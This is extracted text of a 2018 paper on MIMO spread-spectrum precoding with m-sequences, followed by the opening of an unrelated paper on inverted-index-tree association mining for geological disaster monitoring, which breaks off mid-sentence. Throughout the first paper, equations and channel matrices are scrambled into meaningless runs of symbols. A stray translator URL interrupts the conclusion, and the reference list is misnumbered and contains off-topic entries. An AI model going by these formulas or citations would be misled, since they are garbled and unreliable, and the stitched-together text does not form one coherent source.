Network, Monitoring and Controls Volume 03, No.03, 2018 63 paths, which results in a poor phase effect. On the other hand, a large number of multipath signals will lead to the difficulty of DOA information estimation. C. The Advantages of MIMO System Model The application of MIMO technology makes space a kind of resource that can be used to improve performance, and can increase the coverage of wireless system. 1) Improving the capacity of the channel The MIMO access point can transmit and receive multiple spatial flows between the MIMO access point and the client side. The channel capacity can increase linearly with the increase of the number of antennas. Therefore, the capacity of the wireless channel can be doubled by using the MIMO channel. Without increasing the bandwidth and the transmit power of the antenna, the spectrum utilization rate can be doubled. 2) Improving the reliability of the channel By using the spatial multiplexing gain and spatial diversity gain provided by MIMO channel, multiple antennas can be used to suppress channel fading. The application of multi antenna system enables parallel data stream to be transmitted at the same time, which can significantly overcome the channel fading and reduce the bit error rate. D. Application 1) Wireless broadband mobile communication The wireless broadband mobile communication system with MIMO technology can be divided into two categories from the multi antenna placement method of the base station. One is that multiple base station antennas are arranged to form an antenna array and are placed in the coverage area. This class can be called a centralized MIMO, and the other is that the multiple antennas of the base station are scattered in the coverage area. It is called a distributed MIMO. 2）Traditional cellular mobile communication system MIMO technology can be applied directly to traditional cellular mobile communication systems, and the single antenna of base stations can be changed into antenna arrays. The base station carries out MIMO communication with the mobile station with multiple antennas in the cell through the antenna array. 3）Combining with the traditional distributed antenna system The combination of traditional distributed antenna system and MIMO technology can improve the capacity of the system. This new distributed MIMO system structure, distributed wireless communication system (DWCS), has become an important research focus of MIMO technology. 4） The field of wireless communication MIMO technology has become one of the key technologies in the field of wireless communication. Through the continuous development in recent years, MIMO technology will be more and more applied to all kinds of wireless communication systems. 5）Radar field MIMO technology is also used in the field of radar. It mainly uses multiple antennas to transmit different orthogonal waveforms, and covers large space at the same time, and uses long time coherent accumulation to obtain high signal to noise ratio. III. SPREAD SPECTRUM COMMUNICATION A. Spread Spectrum Communication technology The spread spectrum communication technology [5] is a way of information transmission. The bandwidth of the signal is far greater than the minimum bandwidth required for the information transmitted; the expansion of the frequency band is accomplished by an independent code sequence, implemented by the encoding and modulation methods, and is independent of the information data; the same code is used at the receiver. Related synchronous reception, expansion and recovery of transmitted information. The spread spectrum code is used to spread spectrum modulation at the sending end, and the correlation demodulation technology is used to receive the signal at the receiver. Spread spectrum communication needs spread spectrum modulation to transmit spread spectrum modulation, and signal reception needs to be extended with the same spread spectrum coding, which provides the basis for frequency multiplexing and multiple access communication. Making full use of the correlation characteristics between the spread spectrum codes of different code types, it can be allocated to different users and different spread spectrum codes, which can distinguish different users' signals and do not be disturbed by other users, and the frequency reuse can be realized. Spread spectrum signal is obtained by spreading the random sequence pseudo-random code to modulate radio frequency signal or to jump the frequency of carrier signal. Therefore, the spread spectrum system is different from the traditional communication system, and it can share the same channel resources to the maximum extent. Each system has a different extension sequence to reduce interference from other devices. Only recipients with the same extension sequence with the transmitter can restructure or compress the spread spectrum signal to obtain effective loading information. Even if a set of spread spectrum devices use the same channel to transmit signals in the same area, they will not interfere with each other if they use different spread spectrum sequences. The advantage of the channel reuse of spread spectrum system makes it the most ideal choice in the crowded environment of big cities. B. Spread Spectrum Principle At the transmitter, the input information is first modulated by the information to form a digital signal, and then the spread spectrum code sequence generated by the spread spectrum code generator is used to modulate the digital signal to broaden the spectrum of the signal. The broadened signal is then modulated to radio frequency. At the receiving end, the received wideband radio frequency signal is converted to the intermediate frequency, and then the local spread spectrum code sequence generated from the same origin is despreading, and then the information is International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 64 demodulated into the original information output. Figure 2 is a schematic map of spread spectrum technology. Figure 2. Principle diagram of spread spectrum 1) Transmitting terminal i) The information input from the transmitter is modulated by information to form a digital signal. ii) Spread spectrum code generated by spread spectrum code generator to expand the spectrum of digital signal. iii) The digital signal of RF generator is converted into analog signal and sent through RF signal. 2) Receiving terminal i) At the receiving end, the received RF signals are converted from high frequency to intermediate frequency that can be processed by electronic devices, and the analog signals are converted into digital signals. ii) The spread spectrum code generator produces the same spread spectrum code as the sending end to despread the digital signal. iii) Demodulating the digital signal into the original information output. C. Classification of Spread Spectrum Technology In technical implementation, spread spectrum is usually divided into several methods: direct sequence (DS) spread spectrum, frequency hopping (FH) spread spectrum, time hopping (TH) spread spectrum and linear frequency modulation (Chirp) spread spectrum. 1) Direct sequence spread spectrum The spread spectrum sequence with high bit rate is used to expand the spectrum of the signal at the transmitter. At the receiver, the same spread spectrum sequence is used to despread, and the spread spread spectrum signal is restored to original information. 2) Frequency hopping spread spectrum Multiple frequency shift keying is selected by using a sequence of codes. That is to say, the frequency shift keying modulation using the spread spectrum code sequence makes the carrier frequency jump. 3) Time hopping spread spectrum Cause the signal to jump on the time axis. First, the time axis is divided into many time pieces, which is controlled by the sequence of spread spectrum code in one frame. In other words, the time jump can be understood as the time shift keying of the multi time slice selected by a certain code sequence. 4) Linear frequency hopping The transmitted radio frequency pulse signal is broadened in one cycle, and the spread spectrum modulation method is mainly applied to radar. D. Application of Spread Spectrum Communication As a mature high-tech technology, spread spectrum communication can be applied to: (1) The dilute rural areas and underdeveloped areas of the remote people; (2) The prosperous downtown area of the Saturated wired infrastructure; (3) New communities with cable infrastructure lagging due to surging business requirements; (4) User backbone / backup communication network to make up for the shortage of public network of Posts and telecommunications. IV. PRECODING ALGORITHM BASED ON M SPREAD SPECTRUM A. Pseudorandom Code Theory Pseudo random code (Pseudo Random Code, Pseudo Noise Code, PN code, pseudo-noise code) is a code with a similar white noise character, also known as a random (pseudo-noise) sequence. The structure can be pre determined, and can be repeatedly generated and copied, with a random sequence of random characteristics. Pseudorandom code sequences can be generated by the shift register network. The network consists of a RP cascade dual state device shift pulse generator and a modular two adder. White noise is a random process, the instantaneous value obeys the normal distribution, and the power spectrum is uniform in a wide band. With excellent correlation characteristics, the autocorrelation function of white noise is similar to the delta function. But it can not realize amplification, modulation, detection, synchronization and control. Most pseudo random codes are periodic codes, which can be generated and copied artificially, usually generated by binary shift registers. With the nature of white noise, the correlation function has a sharp characteristic, the power spectrum occupies a very wide band, so it is easy to separate from other signals or interference with excellent anti- interference characteristics. In engineering, pseudo-random codes are commonly used to represent pseudo random codes in two yuan domain 0, 1, 0 and 1 elements. (1) In each cycle, the number of 0 elements and 1 elements is approximately equal, and the maximum is only one difference. (2) Within each cycle, the number of element runs of k bit length appears more than twice as many times as the length of k+1 bits (the same element of the same r bit that appears continuously) is called the element distance of the length of the r bit). (3) The autocorrelation function of a sequence is a periodic function and has a dual value property. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 65 1 ( ) 0, 1, 2,.... mN R mk mN N              In the formula, N is the cycle of two yuan sequence, also known as code length or length; k is integer less than N;  is symbol delay. Pseudo-random codes have the following characteristics: (1) The pseudo random signal must have sharp autocorrelation function, and the cross-correlation function value should be close to 0 value. (2) There is enough code cycle to ensure the requirements of anti detection and anti-jamming. (3) The number of codes is enough to be used as independent addresses to achieve code division multiple access requirements. (4) It is easy to be produced in engineering. Birth, processing, reproduction and control. Setting﹛ai﹜ and ﹛bi﹜ is the two code sequence of N,so , N i i N i i a a b b     . Cross correlation function:   1 1 N ab i i i R a b N        If   0abR   , then ai is orthogonal to bi. Autocorrelation function:    1 1 N a i i i R a a N        1) Narrow sense pseudorandom sequence If the length of the code is N, the autocorrelation function of the ﹛ai﹜ sequence is   1 1 1 0, 1, 2,...1 N a i i i mN R a a m N mN N                   2) Generalized pseudorandom sequence If the length of the code is N, the autocorrelation function of the ﹛ai﹜sequence is   1 11 0, 1, 2,... 1 N a i i i mN R a a m mNN                  B. M Sequence The m sequence is a pseudo random sequence, pseudo noise (PN) code or pseudo-random code. A sequence that can be determined and can be repeated is called deterministic sequence. A sequence of random sequences that cannot be determined in advance and can not be repeated. Sequences that cannot be predefined but can be repeated are called pseudo random sequences. The m sequence is a code sequence whose the cycle is 2 ^ 1n  generated by a n- linear shift register, which is the abbreviation of the longest linear shift register sequence. For a n level feedback shift register, there can be up to 2^n states. For a linear feedback shift register, the full "0" state will not be transferred to other states, so the longest period of the sequence of the linear shift register is 2 ^ 1n  .When the period of the {ai} sequence generated by the n level linear shift register is 2 ^ 1n  , {ai} is called a n class m sequence. When the feedback function is a nonlinear function, a nonlinear shift register is formed, and its output sequence is nonlinear sequence. The maximum cycle of output sequence can reach 2^n, and the nonlinear shift register sequence with the maximum cycle value is called m sequence. Generally speaking, in a n level binary shift register generator, the maximum length of code generation cycle is 2 ^ 1n  . Take m=4 as an example, if its initial state is (a3,a2,a1,a0 )=(1,0,0,0), then a new input a4 =1  0=1 is generated by a3 and a0 mode 2 at the time of shift, and the new state becomes (a3,a2,a1,a0 ) = (1,0,0,0) , so that the shift returns to the initial state 15 times, but if the initial state (0, 0, 0, 0), Then, after the shift, the whole state is 0, which means that the whole 0 state should be avoided in this feedback. There are 24=16 different states in the 4 stage. There are 15 kinds of availability except all 0 states, that is, the maximum period of the sequence generated by any 4 level feedback latch is up to 15, which satisfies the 2n-1. + + + c1 c2 Cn-1 an an-1 a2 a1 c0=1 cn=1 输出 Figure 3. N class linear feedback latch ai(i=0~n) - the state of the latch. ai=0 or 1 - feedback state. ci=0 indicates that the feedback line is disconnected, and ci=1 means the feedback line is connected. Figure 3 shows the composition of a general pure feedback latch. The connection state of the feedback line is expressed in ci, ci=1 indicates that the line is connected, the ci=0 is disconnected, and the connection state of the feedback line is different, which may change the period of the latch. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 66 In order to generate m sequences, the characteristic polynomial must be determined to determine the feedback structure of the linear feedback shift register. The characteristic equation of the N class linear shift register is defined as: 2 1 2 ( ) 1 n n f x c x c x c x      The original polynomial of the m sequence is as follows: 5 2 ( ) 1A x x x   ，Figure 4 is a shift register structure diagram. Figure 4. Shift register structure diagram The initialization register is [D5 D4 D3 D2 D1]=[0 0 0 0 1], the register first shifts left to see m (0) =0, and then according to the above picture, we can see feedback D1=C5  C3. Because of the 5 order register, the code length is N=25-1=31. So 31 cycles are needed to get the required m sequence. The simulation results are as follows: 0 5 10 15 20 25 30 35 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 Figure 5. M sequence simulation result diagram C. The Properties of M Sequence 1) Equilibrium In a period of m sequence, the number of symbols "1" and "0" are roughly equal, "0" appears 2n-1-1 times, and "1" appears 2n-1 times ("1" more than "0"). 2) Run length distribution Run length refers to the same element in the sequence. And the number of this element is called the length of the travel. 3) Shift additive properties A m sequence Mp is added to a different sequence of Mr ,generated by any delay shift, modules 2 and is still a Mz of a delay shift sequence of Mp, that is, Mp  Mr=Mz. Now, the m sequence of a m=7 is now taken as an example, One period of Mp is set to 1110010, and the other sequence Mr is the result that Mp moves to the right one time, that is, a corresponding period of Mr is 0111001, the two sequence modules 2 and the corresponding period of the 1110010  0111001=1001011 upper form for Mz, which is the same as the result of the Mp shift to the right 5 times. 4) Autocorrelation characteristics Autocorrelation and cross correlation: A m sequence and its shifted sequence are 2 bit by bit, the sequence obtained is also a m sequence, but the phase is different. The m sequence for 2 different phases in the m sequence generator. When the period p is large and the r module is 0p , the two sequences are almost orthogonal. 1, 0 ( ) 1 , 1, 2, , 1 j R j j m m          5) Periodicity As the m sequence has periodicity, its autocorrelation function is also cyclical, and the period is m, namely ( ) ( )R j R j km  , when , 1, 2,j km k   -m -1 1 0 1 2 R(j) 1/m m i Figure 6. Periodic schematic diagram of m sequence The maximum length of the m sequence depends on the progression of the shift register, and the structure of the code depends on the location and quantity of the feedback. Different tapped combinations produce code sequences of different lengths and structures, and some tap combinations fail to produce the longest cycle sequences. A great deal of research has been done on what kind of length and sequence of code can be produced by tap. The connection diagram of the 100 level M sequence generator and the structure of the generated m sequence have been obtained. 6) Power spectral density Power spectral density and autocorrelation coefficient constitute a pair of Fu Liye transform. Find out as follows: 2 2 2 1 sin( / 2 ) 2 1 ( ) ( ) / 2 n m T m n R m T m T m                          International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 67 Because when m is large, the equilibrium of the m sequence, the range distribution, the autocorrelation and the power spectrum density are all similar to the white noise, but it has the regularity and can be repeated, so the m sequence belongs to a pseudo noise sequence. D. Application of M Sequence and Its Significance 1) Application in communication encryption The autocorrelation of m sequence is good, it is easy to produce and copy, and has pseudo randomness. Using m sequence to encrypt the digital signal, the encrypted signal has the characteristic of pseudo noise while carrying the original signal, so as to achieve the purpose of hiding information in the process of signal transmission; at the receiver, the m sequence is used again to decrypt and restore the original signal. 2) The application of the radar signal design In recent years, the signal used in the spread spectrum radar is a pseudo random sequence with a modulated noise character. It has a high distance resolution and velocity resolution. The receiver of this radar works by means of correlation demodulation. It can work at low SNR and has strong anti-interference capability. The radar is a kind of continuous wave radar, which has low probability of interception. It is a kind of new radar, high performance and suitable for modern high-tech war. The radar system using pseudo-random sequences as launching signals has many outstanding advantages. First, it is a continuous wave radar, which can make good use of transmitter power. Secondly, in a certain signal to noise ratio, it can achieve a good measurement accuracy and guarantee the single value of the measurement, which has a higher distance resolution and velocity resolution than the monopulse radar. Finally, it has strong anti-jamming ability, and the enemy will interfere with this wideband radar signal, which will be much more difficult than interfering with ordinary radar signals. 3) Application in communication system Pseudo random sequence is a seemingly random, actually regular periodic binary sequence, which has the properties similar to noise sequence. In CDMA, the address code is selected from pseudo random sequence, and a pseudo random sequence is used most easily in CDMA; m sequence is used to distinguish different users from different phases of the m sequence. For data security, a data mask (data disruption) technique is used in the paging channel and forward service channel of the CDMA, which is used to scramble the traffic channel with the m sequence of the length of 12 42  , which is performed on the modulation characters output by the packet interleaver. Through the interleaver output character and the long code PN chip, the binary mode addition is completed. E. Precoding Algorithm Based on M Spread Spectrum On the basis of the original spread spectrum technology, the algorithm proposed a new technology. The general signal must have the matrix parameters of the channel itself during a certain channel during the transmission and reception. In this way, the reduction of the signal is difficult when receiving the signal at the receiving end. In other words, in real life, the general signal sending and receiving may make the device of the receiver complex. In order to simplify the receiving device, the inverse matrix of the channel is multiplied before the signal is sent, so that the purpose is achieved within a certain range of bit error rate. The design steps are as follows: Step (1): The data flow of the first user is   1 { } k b ,   2 { } k b and }{ )( 3b k . The base station transmitter encodes the data of three channels to get coded signals   1 k s ,   2 k s and   3 k s :  Gbs Gbs Gbs kk kk kk 3 )( 3 )( 3 2 )( 2 )( 2 1 )( 1 )( 1     Among them, 1 G , 2 G and 3 G are generating matrices. The three spatial channel of user K uses three different encoding. 1 G , 2 G , and 3 G corresponding check matrices are 1 H , 2 H and 3 H ; Step 2): The coding signals   1 k s ,   2 k s and   3 k s of the K user are modulated by the channel matrix.                                                          )( 3 )( 2 )( 1 1 332313 322212 312111 3 2 1 k k k kkk kkk kkk k k k hhh hhh hhh s s s z z z  Among them,  ( ) , , 1, 2, 3kijh i j  is the attenuation coefficient of the base station transmitter antenna i to the k mobile receiver antenna j through the independent Rayleigh path. and the baseband modulation signals of the k users,   1 k z ,   2 k z and   3 k z , kk ,,1 are obtained. Step 3): The base band transmitter modulates the baseband modulation signals   1 k z ,   2 k z and   3 k z , kk ,,1 , and obtains the signal   1 ( ) k t z ,   2 ( ) k t z and   3 ( ) k t z based on the M spread spectrum precoding, and then the three antennas are transmitted respectively. Step 4): The k mobile receiver uses the local despreading circuit to extract the baseband encoded signals   1 k y ,   2 k y and   3 k y . International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 68                                                                n n n k 3 k 2 k 1 )( 3 )( 2 )( 1 )( 3 )( 2 )( 1 )( 3 1 )( 2 1 )( 1 1 )( 33 )( 23 )( 13 )( 32 )( 22 )( 12 )( 31 )( 21 )( 11 )( )( )( ）（）（）（ z z z hhh hhh hhh y y y rt rt rt k k k T k k k k k k kkk kkk kkk  In formula 12,   1 k n is the baseband noise vector for the first antenna’s channel of the k mobile station receiver,   2 k n is the baseband noise vector for the second antenna’s channel of the k mobile station receiver,   3 k n is the baseband noise vector for the third antenna’s channel of the k mobile station receiver , 1 ( ) 1 ( ) k t r  , 1 ( ) 2 ( ) k t r  and 1 ( ) 3 ( ) k t r  are the representations of despreading. Step 5): The k receiver uses a local decoder to decode the received baseband signals   1 k y ,   2 k y and   3 k y , and extracts the data streams of the base station to transmit data streams ( ) 1 k b , ( ) 2 k b and ( ) 3 k b , with ( ) ( ) 1 1 0 k k b H  , ( ) ( ) 2 2 0 k k b H  and ( ) ( ) 3 3 0 k k b H  without error. V. SIMULATION ANALYSIS Taking the 3*3 antenna system as an example, a binary original signal with a sequence length of 9 is sent as shown in Figure 7. Before sending the signal, a binary signal with a spread spectrum growth of 15 is spread out with a precoding algorithm based on M spread spectrum, and the binary signal processed by the algorithm is shown as shown in Figure 8. after the receiver despreading. It is found that the original signal and the received signal have some error. Therefore, the different antenna systems using the algorithm, the error rate simulation under the same signal to noise ratio, and under the same antenna system, the algorithm is applied to simulate the error rate of the algorithm without using the algorithm. 0 1 2 3 4 5 6 7 8 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 Original sequence Figure 7. Original signal 0 1 2 3 4 5 6 7 8 0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1 Receiving sequence Figure 8. The signal received by this algorithm The error rate simulation is carried out with different antenna systems. The results are shown in Figure 9. The bit error rate increases with the increase of the number of antennas at the same signal to noise ratio, but the bit error rate tends to be stable with the increase of signal to noise ratio. With the increase of the signal to noise ratio, the bit error rate decreases. For the same antenna system, the BER of the antenna system adopting the algorithm is significantly lower than that of the antenna system without the same signal to noise ratio. 0 5 10 15 10 -0.8 10 -0.7 10 -0.6 10 -0.5 10 -0.4 10 -0.3 SNR(dB) e rr o r ra te 3*3 antenna system uses this algorithm 3*3 antenna system does not use this algorithm 2*2 antenna system uses this algorithm Figure 9. Error rate simulation diagram It can be concluded that the algorithm can be used to simplify the receiving device of the receiver to a certain extent. But in practical applications, the interference of various signals in the channel also affects the signal of the receiver, so the algorithm needs to be improved so as to adapt to various channels. VI. CONCLUSION AND PROSPECT With the rapid development of science and technology, the demand for wireless service is not only the improvement of information rate, but also the high quality of receiving information. The space reuse and diversity technology of http://fanyi.baidu.com/#zh/en/javascript:void(0); International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 69 MIMO multi antenna communication system can effectively transmit and receive multiple data streams at the same time and in the same frequency band. Reasonable use of spatial multiplexing and diversity technology can not only improve information rate, but also improve system performance. It can greatly improve the spectrum utilization of communication systems and meet the high rate of users' communication needs. Therefore, it has received extensive attention and research at home and abroad. It has become one of the most promising technologies in the 5G mobile communication system. In the actual production and life, sometimes too many complex equipment will affect the results and feasibility of the experiment, so we should also pay attention to the study of the technology, and we should also pay attention to the simplification of the equipment without affecting the experimental results. The purpose of this project is to bring forward a new principle based on the original spread spectrum, according to the theoretical knowledge, so that the equipment can be simplified. In this way, a higher effect will be achieved in the application of the 5G MIMO system. However, due to the interference of all kinds of noise in the signal transmission, it will have a certain influence on the receiving signal. Therefore, the algorithm can be improved from the direction of interference coordination to reduce the impact of interference on the received signal. ACKNOWLEDGEMENTS This project is supported by ‘The Excellent Going Abroad Experts’ Training Program in Hebei Province, Doctoral research fund of North China University of Science and Technology, National Science and technology support program (No. 2013BAH72B01), Hebei Natural Science Foundation of China: (No. F2014209276). REFERENCES [1] Guo Wenzhuo. Research on Key Technologies of multi antenna multiuser communication system [D]. Harbin: Harbin Engineering University, 2009. [2] Zhang Fenghua, Li Wangqing. Application and development of spread spectrum communication technology [N]. Xinjiang science and technology daily (Han), 2005. [3] Research on differential space-time coding technology in Chen Yuyan MIMO-OFDM system [D]. Shanghai: Shanghai Jiao Tong University.2006. [4] GAN Y H, LING C MOW W H. Complex lattice reduction algorithm for low-complexity full-diversity MIMO detection[J]. IEEE Transactions on Signal Processing, 2009, 57(7): 2701-2710. [5] ZU K, LAMARE R C, HAARDT M. Generalized design of low-complexity block diagonalization type precoding algorithms for multiuser MIMO systems[J]. IEEE Transactions on Communications, 2013, 61(2): 4232-4242 . [6] Dong Tao, Jiang Zhucheng, you Xiao Hu. Optimization of channel estimation for spread spectrum system [J]. circuit and systems, 2004- 02. [7] F Adachi,M Sawahashi,H Suda. Wideband DS-CDMA for next- generation mobile communications systems[J].IEEE CommunicationsMagazine,1988,(09):56-69. [8] Wang Huihua, Li Baoping. M sequence generator [J]. Journal of Beijing Electronics Science and Technology Institute, 2007,02:58-61. [9] Liu Zhenming.Study on the cross correlation properties of m sequences [D].University of national defense science and technology, 2009. [10] Cheng Jianli, Huang Fuqing, Tu Jia, Xu Yitao. The soft spread spectrum technology based on the same spread spectrum code [A]., the Youth Work Committee of the Chinese communications society, the new development of the.2007 communication theory and technology of the school of information engineering of North China University of Technology - the Twelfth National Youth communications academic association (book below) [C]. China Communications Society School of information engineering, North China University of Technology, 2007:4. [11] Ma Yufeng, Lv Chengmin, Song Feng, Sun Jun. A research on the information hiding algorithm based on spread spectrum technology [A]. China Communications Society. The fifth academic annual conference of the China Communications Society, [C]. China Communications Society: 2008:5.[17] AI Bo. MIMO communication system coding [M]. Electronic Industry Press,.2008. [12] Chen Hong.MIMO-OFDM key technology research [D]. Tianjin: Tianjin University, 2010. [13] Nie Chunyan. Creative judgment of claims in communication network technology category [N]. China Intellectual Property Office, 2008. [14] Ting Ann. Effective CRM software. Legacy systems can be accessed using integration technology.[J]. Healthcare Informatics, 2004, 21(2). [18] [15] Joseph G. Young. Program analysis and transformation in mathematical programming[D]. Rice University, 2008. [16] Comeron J M, Kreitman M. The correlation between synonymous and nonsynonymous substitutions in Drosophila: mutation, selection or relaxed constraints[J]. Genetics, 1998, 150(2). [17] Tao Chongqiang, Yang Quan, Yuan Xiao. Simulation study on spread spectrum communication system of m sequence, Gold sequence and orthogonal Gold sequence [J]. electronic design engineering, 2012 (18): 148-150. [18] Gu Jingmin, Liang Tao, Yu Yong. A new MIMO transmission power allocation algorithm research [A]. communication theory and new progress in signal processing - 2005 communication theory and signal processing annual conference paper, [C], 2005. [19] Xiong Yan. Research on precoding technology of MIMO multi-user broadcast channel [D]. Beijing: Beijing University of Posts and Telecommunications.2011. [20] Antenna selection technology in Fang Xiaoyong MIMO system [D]. Xi'an: Xi'an Electronic and Science University,.2009 . http://d.wanfangdata.com.cn/NSTLQK_NSTL_QK.aspx http://d.wanfangdata.com.cn/NSTLQK_NSTL_QK.aspx http://d.scholar.cnki.net/Detail/SJPD2059_U/SJPD12102401523294 http://d.scholar.cnki.net/Detail/SJPD2059_U/SJPD12102401523294 http://proquest.cnki.net/kcms/detail/detail.aspx?dbcode=PQDT&dbname=PQDT&filename=PQDT200803309993&v=MDM2MDJJR0R4TTR6bVVXbVQ4SVRncmdxeE5HRDdxUUtyaWZadU52RXlybFU3akpLVnNYTlR6UGVyRzRIdG5Nckl4RmJl http://proquest.cnki.net/kcms/detail/detail.aspx?dbcode=PQDT&dbname=PQDT&filename=PQDT200803309993&v=MDM2MDJJR0R4TTR6bVVXbVQ4SVRncmdxeE5HRDdxUUtyaWZadU52RXlybFU3akpLVnNYTlR6UGVyRzRIdG5Nckl4RmJl http://d.scholar.cnki.net/Detail/SJPD2059_U/SJPD12102900726531 http://d.scholar.cnki.net/Detail/SJPD2059_U/SJPD12102900726531 http://d.scholar.cnki.net/Detail/SJPD2059_U/SJPD12102900726531 work_7p5ztx3635bq5edkve5fwxg25i ---- 基于Hadoop的倒排索引树增量更新关联挖掘并行算法 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 45 Application of Incremental Updating Association Mining Algorithm in Geological Disasters System Wang Jianguo School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: wjg_xit@126.com Zhu Ying School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 642454565@qq.com Abstract—Aiming at the problems of low efficiency, low cost of time and space, This paper proposes an algorithm to update the association mining of the inverted index tree. The algorithm combines the inverted index technology with the tree structure. When the data in the database is continuously updated, it can scan only the newly added part of the database, without having to scan the original database to count the number of transaction items. The optimal threshold predicted by Newton's interpolation formula is compared with this frequency to get frequent item sets. Then, the confidence level is calculated for the combinations of different item sets in frequent item sets, and the correlation rules are obtained, and the correlation analysis of the rules is carried out to obtain a more realistic association rule. The inverted index tree updating association mining algorithm was applied to the data analysis of geological hazards monitoring system. One year data record of rainfall, groundwater level, soil water content and topography data was selected as the experimental data set. Compared with the IUAR algorithm, it is found that the inverted index tree updating association mining algorithm has some improvements in memory consumption and efficiency. The experimental results show that When the minimum support of IUAR algorithm remains unchanged, the number of transaction records is the same as the amount of new data, and Inverted Index Tree Incremental Updating Association Mining Algorithm takes less than 2/5 of the IUAR algorithm. When the number of transaction records and the amount of new data remain unchanged and IUAR algorithm support changes, the Inverted Index Tree Incremental Updating Association Mining Algorithm memory consumption is much smaller than IUAR algorithm. In the process of experiment, according to the results of the Inverted Index Tree Incremental Updating Association Mining Algorithm, the association rules are obtained and the correlation is judged. The strong association rules are used to set the alarm threshold of the geological disaster monitoring system. Keywords-Inverted Index Tree; Geological Disaster System; Frequent Item Sets; Association Rules I. INTRODUCTION Geological disasters are geological phenomena that cause serious harm or potential threat to human lives and property. Human activities can affect the occurrence of geological disasters and the extent of their damage, but they can not be completely eliminated or prevented. In addition to earthquakes, volcanoes, tsunamis and other sudden geological disasters can cause unmanageable destructive disaster to humans. Some slowly changing geological disasters such as landslides, land subsidence and ground fissures will also bring huge losses to the lives and property of the people, the economic development in cities and areas. Geological disasters have seriously affected the sustainable development of society and affected social stability. Therefore, geological disaster data is an important basic resource related to national economy and the people's livelihood, because the data contains a lot of useful information. But understanding and relying on these data to make scientific 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 46 decisions is beyond human capacity. How to make full use of geological exploration data to make relevant prediction and scientific decision-making has become one of the concerns of production decision makers. Association Rule Mining[1] is one of the most explored, most commonly used data mining technology. This method is one of the most active research areas in the field of data mining. It mainly helps to discover the implicit and valuable relationships between data items in massive databases to guide decision makers in various fields such as commerce Strategic analysis. Researching association rule algorithms in big data technology environment is a very important and challenging research topic. Considering that the data in the database of geological disasters always change constantly, the incremental association rule updating techniques have been proposed to effectively maintain the association rules of updated data. The technology should have some characteristics:  The association rules should vary with the data;  The rule updating should avoid dealing with the old data again, as much as possible to use the previous processing results;  Updating maintenance methods should be applied to a variety of occasions as much as possible. FUP algorithm is iterative update algorithm based on Apriori algorithm. In order to solve the problem of incremental updating mining of association rules, Cheung and other scholars proposed a fast update algorithm (FUP)[2]. Later, domestic scholars such as Zhu Yuquan proposed a method FUKFIA[3] for rapidly updating frequent item sets based on the FUP algorithm. They define a new set of frequent items that reduce the number of database scans to a certain extent. Inevitably, the above incremental updating algorithm of association rules, like the Apriori algorithm, requires layer-by-layer traversal to generate frequent item sets. Therefore, there is also the problem of overhead in processing databases and generating huge candidate item sets.FUP2 algorithm[4] is based on the FUP algorithm to improve, put forward an improved algorithm for transaction records in the constantly updated, correct and delete operations. Feng Yucai and other scholars put forward incremental update association mining algorithm IUA and PIUA[5]. In the algorithm, splicing and pruning techniques are used to solve the generation of candidate item sets. When the transaction database is unchanged and the minimum support threshold is changed. CATS-tree algorithm[6], IUAR algorithm[7] are through a variety of methods to reduce the number of scanning the original database to achieve incremental update association rules maintenance issues. To sum up, the FUP algorithm and the FUP2 algorithm are used to maintain the incremental updating association mining when the minimum support threshold and the minimum confidence threshold do not change, and the transaction records are continuously updated. IUA algorithm, PIUA algorithm and CATS-tree algorithm handle the maintenance of incremental updating association mining when the transaction record data does not change, the minimum support threshold and the minimum confidence threshold change. The IUAR algorithm is used to solve the problem of maintaining and updating the association mining when the transaction database is continuously updated and the minimum support threshold is changed. The basic idea of the algorithm is to obtain the extended set of candidate frequent items by reducing the support degree. When accessing the updated database, the association rules are incrementally updated by constantly updating the candidate frequent item sets. Although this algorithm has been greatly optimized in terms of the large number of candidate item sets, there are still some shortcomings that it is necessary to retrieve the original transaction database multiple times and produce a large number of candidate item sets. So far, there has been relatively little research on incremental updates in the context of big data environments when both the transaction database and the minimum support threshold are changed. Therefore, it is very necessary to find an incremental update mining method that can effectively solve such problems. In this paper, we propose an incremental update mining algorithm for inverted index tree, which is applied to geological disaster monitoring system. Firstly, the frequent 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 47 item sets are excavated according to the database, and then the association rules are obtained and analyzed. Finally, the association rules are applied to the early warning work. II. INVERTED INDEX AND INVERTED INDEX TREE A. Inverted index The inverted index is the most commonly used data structure in the information retrieval system. In the index, each index item consists of the attribute value and the location information that appears,. At the time of querying, you can get all the documents that contain the keyword at once, so the retrieval efficiency is higher than the forward index. For example, Table1 is a partial transaction log of the groundwater table (derived from the original transaction database of the Geological Disaster Monitoring System), and Figure 1 is the inverted index map (IIP)[8] of TABLE I. TABLE I. GROUNDWATER TABLE IN GEOLOGICAL DISASTERS DATABASE (MM) ID Groundwater level 0 48 1 52 2 46 3 43 4 42 5 52 6 53 7 47 8 42 9 40 10 39 11 54 Figure 1. TABLE.I corresponds to the inverted index map(IIP) B. Inverted index tree based on B+ tree implementation B+ tree is the deformation of the B-tree. A m-order B+ tree[9] should meet the following characteristics:  The number of keywords per node is equal to the number of children. The keywords of all non-lowest inner nodes are the largest keywords on the corresponding sub-tree, and the bottom node contains all the keywords;  Branch nodes can be placed (m-1) keyword, leaf nodes can put m keywords;  All leaf nodes are in the same layer of the number structure and do not contain any information. Thus, the tree height of the tree is balanced. B+ tree is a commonly used index mechanism in the database and a one-dimensional data index structure design[10]. As shown in Figure 2, a B+ tree consisting of the divided character string is m=3. Figure 2. Order three of the B+ tree 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 48 III. ALGORITHM OF INCREMENTAL UPDATING RULE MINING FOR INVERTED INDEX TREE The above traditional frequent item sets mining algorithm has disadvantages when generating association rules mining will generate a large number of candidate item sets and repeat retrieval processing of the original database. In this paper, we implement the inverted index tree based on the characteristics 